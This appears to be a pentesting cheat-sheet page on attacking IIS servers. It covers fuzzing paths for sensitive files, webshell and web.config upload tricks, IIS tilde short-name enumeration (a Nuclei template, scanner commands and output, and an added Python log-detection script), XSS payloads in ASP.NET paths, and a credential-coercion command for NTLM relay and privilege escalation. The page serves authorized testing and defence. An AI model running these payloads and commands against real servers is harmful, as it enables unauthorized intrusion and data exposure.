IIS
Fuzzing
/trace.axd
/trace.axd?id=1
/admin/help.cgi
/admin/help.cgi.bak
/admin/WS_FTP.LOG
/adovbs.inc
/confirm.asp.bak
/default.asp.bak
/login.asp.bak
/pindex.asp.bak
/rootlogin.asp.bak
/rootlogin.asp.old
/_vti_pvt/service.cnf
/include/common.inc
/WS_FTP.LOG
/service.cnf
/aspnet_client
/global.asax
Wordlists
trace.axd enabled
Information leak
Information disclosure
Try
target.com/><img>
Often discloses info.
PUT method enabled
Try uploading .aspx webshell or web.config
Insecure File Upload
Try to upload web.config
Website using PHP
It is possible to use filename="web<<" in the file upload request. If web** replaces another file in the same directory (for example web.aspx), another combination can be used, such as filename="web<<>fig" or filename='web"config'.
web.config or web.xml
https://x.x.x.x/.//WEB-INF/web.config
https://x.x.x.x/.//WEB-INF/web.xml
Viewstate
Internal IP disclosure
> curl -v --http1.0 http://example.com
HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Pragma: no-cache
Location: https://192.168.5.237/owa/
Server: Microsoft-IIS/10.0
X-FEServer: NHEXCHANGE2016
Tilde Enumeration
http://example.com/~a
http://example.com/~b
http://example.com/~c
...
Assume the server contains a hidden directory named SecretDocuments. When a request is sent to http://example.com/~s, the server replies with a 200 OK status code, revealing a directory with a short name beginning with "s".
http://example.com/~se
http://example.com/~sf
http://example.com/~sg
...
Once the short name secret~1 is identified, enumeration of specific file names within that path can be performed, potentially exposing sensitive documents:
http://example.com/secret~1/somefile.txt
http://example.com/secret~1/anotherfile.docx
The same IIS tilde directory enumeration technique can also detect 8.3 short file names for files within the directory:
http://example.com/secret~1/somefi~1.txt
If two files named somefile.txt and somefile1.txt exist in the same directory, their 8.3 short file names would be:
somefi~1.txt for somefile.txt
somefi~2.txt for somefile1.txt
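As the defender's counterpart to the enumeration described above, this added example (not from the original page) parses constructed IIS W3C extended log lines and flags client IPs that issue wildcard 8.3 short-name probes; the log sample, field list and probe threshold are assumptions.

```python
import re
from collections import defaultdict
# Constructed sample of an IIS W3C extended log (not from the page); the field list is trimmed.
SAMPLE_LOG = """#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip sc-status sc-substatus
2024-01-10 09:00:01 10.0.0.5 GET /index.aspx - 443 203.0.113.7 200 0
2024-01-10 09:00:02 10.0.0.5 GET /a*~1*/a.aspx - 443 198.51.100.23 400 0
2024-01-10 09:00:02 10.0.0.5 GET /b*~1*/a.aspx - 443 198.51.100.23 400 0
2024-01-10 09:00:03 10.0.0.5 GET /s*~1*/a.aspx - 443 198.51.100.23 404 0
2024-01-10 09:00:03 10.0.0.5 OPTIONS /se*~1*/a.aspx - 443 198.51.100.23 404 0
2024-01-10 09:00:04 10.0.0.5 GET /secret~1/somefi~1.txt - 443 198.51.100.23 200 0
2024-01-10 09:00:05 10.0.0.5 GET /~jdoe/ - 443 203.0.113.7 404 0
"""

# 8.3-form segment: 1-6 name chars (wildcards allowed), '~', one digit; '/~user/' paths do not match.
SHORT_NAME = re.compile(r"(?:^|/)[^/~]{1,6}\*?~\d\*?(?=[/.]|$)")

def parse_w3c(text):
    """Parse W3C extended log lines into dicts keyed by the names in the #Fields directive."""
    fields, records = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            records.append(dict(zip(fields, line.split())))
    return records

def summarize_tilde_activity(records):
    """Per client IP: count wildcard 8.3 probes and plain short-name requests, collect status codes."""
    per_ip = defaultdict(lambda: {"wildcard_probes": 0, "shortname_requests": 0, "status_codes": set()})
    for r in records:
        stem = r["cs-uri-stem"]
        if not SHORT_NAME.search(stem):
            continue
        entry = per_ip[r["c-ip"]]
        if "*" in stem:
            entry["wildcard_probes"] += 1     # enumeration-style probe
        else:
            entry["shortname_requests"] += 1  # a discovered short name used directly
        entry["status_codes"].add(int(r["sc-status"]))
    return dict(per_ip)

def flag_enumeration(summary, min_probes=3):
    """Client IPs whose wildcard probe count reaches the threshold (assumed default: 3)."""
    return sorted(ip for ip, s in summary.items() if s["wildcard_probes"] >= min_probes)

if __name__ == "__main__":
    summary = summarize_tilde_activity(parse_w3c(SAMPLE_LOG))
    for ip in flag_enumeration(summary):
        print(ip, summary[ip])
```

The response codes are collected only for context; the signal is the burst of wildcard probes per client, which normal browsing never produces.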
IIS Tilde Enumeration Scanner - Burp Extension


Nuclei Template
https://github.com/coffinxp/priv8-Nuclei/blob/main/iis.yaml
id: iis-shortname

info:
  name: iis-shortname
  author: coffin
  severity: low
  description: When IIS uses an old .Net Framework it's possible to enumeration folder with the symbol ~.
  reference:
    - https://github.com/irsdl/IIS-ShortName-Scanner
    - https://github.com/lijiejie/IIS_shortname_Scanner
    - https://www.exploit-db.com/exploits/19525
  tags: iis

variables:
  randstring: "{{to_lower(rand_base(8))}}"

requests:
  - raw:
      - |
        GET /{{randstring}}*~1*/a.aspx HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
      - |
        GET /*~1*/a.aspx' HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
      - |
        OPTIONS /{{randstring}}*~1*/a.aspx HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
      - |
        OPTIONS /*~1*/a.aspx' HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
      - |
        DEBUG /{{randstring}}*~1*/a.aspx HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
      - |
        DEBUG /*~1*/a.aspx HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - "status_code_1 != 404 && status_code_2 == 404 || status_code_3 != 404 && status_code_4 == 404 || status_code_5 != 404 && status_code_6 == 404"
ShortScan
shortscan http://yourtarget.com -F
IIS ShortName Scanner
java -jar iis_shortname_scanner.jar 0 5 http://10.129.204.231/
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Do you want to use proxy [Y=Yes, Anything Else=No]?
# IIS Short Name (8.3) Scanner version 2023.0 - scan initiated 2023/03/23 15:06:57
Target: http://10.129.204.231/
|_ Result: Vulnerable!
|_ Used HTTP method: OPTIONS
|_ Suffix (magic part): /~1/
|_ Extra information:
|_ Number of sent requests: 553
|_ Identified directories: 2
|_ ASPNET~1
|_ UPLOAD~1
|_ Identified files: 3
|_ CSASPX~1.CS
|_ Actual extension = .CS
|_ CSASPX~1.CS??
|_ TRANSF~1.ASP

Upon executing the tool, it discovers 2 directories and 3 files. However, the target does not permit GET access to http://10.129.204.231/TRANSF~1.ASP, so the remainder of the filename has to be brute-forced.
Or:
# python iis_shortname_scan.py http://target
Generate Wordlist
egrep -r ^transf /usr/share/wordlists/ | sed 's/^[^:]*://' > /tmp/list.txt
Fuzzing
gobuster dir -u http://10.129.204.231/ -w /tmp/list.txt -x .aspx,.asp
XSS
http://domain.com/dossier/(Z("onerror="alert%601%60"))/file.aspx
http://domain.com/dossier/(Z("onerror="confirm%60Redirect%20Login%60"))/file.aspx
See XSS Page - ASP part
Resources
Script to configure IIS
Privilege Escalation
To coerce an HTTP authentication from the machine account:
powershell iwr http://192.168.56.1 -UseDefaultCredentials

then relay to LDAP and:
start_tls + add a computer to the domain + RBCD, or
shadow credentials
Example with RBCD :

Shell as admin:

Credit: M4fly
Interesting Books
The Web Application Hacker's Handbook: The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more.
Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities: Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them.
Real-World Bug Hunting: A Field Guide to Web Hacking: Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.